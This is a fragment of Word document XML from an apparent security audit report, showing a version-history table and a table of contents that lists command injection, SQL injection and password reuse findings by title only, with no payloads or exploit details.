          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F585330" w14:textId="5EC64D00" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>First Draft</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E50B77" w:rsidRPr="002355AE" w14:paraId="243E914C" w14:textId="77777777" w:rsidTr="00E50B77">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2119" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="050227B6" w14:textId="743B18C3" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>0.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2355" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EBA1263" w14:textId="045E411A" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>11/19/2022</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03602C52" w14:textId="5DF54720" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>Josh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B90FCCA" w14:textId="44F3A98A" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>Internal Review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E50B77" w:rsidRPr="002355AE" w14:paraId="18B65B89" w14:textId="77777777" w:rsidTr="00F308CB">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="174"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2119" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="205400B5" w14:textId="35934FB0" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2355" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51ABEDC1" w14:textId="61F2FDF3" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>11/19/2022</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4BCCE253" w14:textId="2927D226" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>Dima</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E13627F" w14:textId="587872C0" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>Final Release</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CFE8193" w14:textId="77777777" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:id w:val="-13682868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957DCD9" w14:textId="11995432" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77">
          <w:pPr>
            <w:pStyle w:val="Inhaltsverzeichnisberschrift"/>
            <w:rPr>
              <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
              <w:b/>
              <w:color w:val="auto"/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="002355AE">
            <w:rPr>
              <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
              <w:b/>
              <w:color w:val="auto"/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
            <w:t>Table of Content</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3370DD2B" w14:textId="3F82D9C5" w:rsidR="00D678A8" w:rsidRDefault="00E50B77">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="002355AE">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="002355AE">
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="002355AE">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc119794102" w:history="1">
            <w:r w:rsidR="00D678A8" w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Contact Information</w:t>
            </w:r>
            <w:r w:rsidR="00D678A8">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D678A8">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D678A8">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794102 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D678A8">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D678A8">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00D678A8">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0BE17D76" w14:textId="0FF98B75" w:rsidR="00D678A8" w:rsidRDefault="00D678A8">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc119794103" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Change History</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794103 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6496CC3D" w14:textId="6DC4DD9F" w:rsidR="00D678A8" w:rsidRDefault="00D678A8">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc119794104" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Management Summary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794104 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08263F18" w14:textId="549FAF84" w:rsidR="00D678A8" w:rsidRDefault="00D678A8">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc119794105" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794105 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E4F23A8" w14:textId="36DDA622"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06" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Object of Investigation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794106 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D17B6C0" w14:textId="2834F65A"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07" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Investigation Period</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794107 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11CAD1F9" w14:textId="0D70EE12"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08" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Rules of Engagement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794108 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2CE5F86D" w14:textId="3A57FE09"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09" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Limits of the Tests performed</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794109 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D784591" w14:textId="53426F04" w:rsidR="00D678A8" w:rsidRDefault="00D678A8">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc119794110" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Security Audit Findings</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794110 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A118897" w14:textId="2926488F"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11" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Identified vulnerabilities</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794111 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6DB1FC8B" w14:textId="556580D1" w:rsidR="00D678A8" w:rsidRDefault="00D678A8">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc119794112" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Command Injection – Docker application “pseudo-terminal” (CRITICAL)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794112 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60324BB8" w14:textId="042E16DD" w:rsidR="00D678A8" w:rsidRDefault="00D678A8">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc119794113" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQL Injection – Internal login page (HIGH)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794113 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="048FA8FD" w14:textId="7F0BCB7A" w:rsidR="00D678A8" w:rsidRDefault="00D678A8">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc119794114" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Password Reuse – Backend (HIGH)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794114 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1652AEE8" w14:textId="01F98C55"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15" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Possible Exploitation Paths</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794115 \h </w:instrText>
            </w:r>
            <w:r>
